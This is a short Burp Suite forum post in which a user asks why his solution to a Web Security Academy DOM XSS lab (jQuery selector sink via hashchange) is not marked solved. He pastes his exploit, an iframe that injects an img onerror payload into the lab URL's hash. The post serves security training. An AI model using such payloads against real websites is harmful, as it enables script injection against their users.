The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

DOM XSS in jQuery selector sink using a hashchange event exploit servernot working

Nelson | Last updated: Oct 26, 2024 02:40AM UTC

I solved this challenge successfully, the XSS triggers everytime i click view exploit, however when i send it to the victim it doesnt do anything,and its still not marked as a solved challenge, this is my exploit: <iframe src="https://0a5a002204d9eeb5de3f3680003100ad.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"</iframe>

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.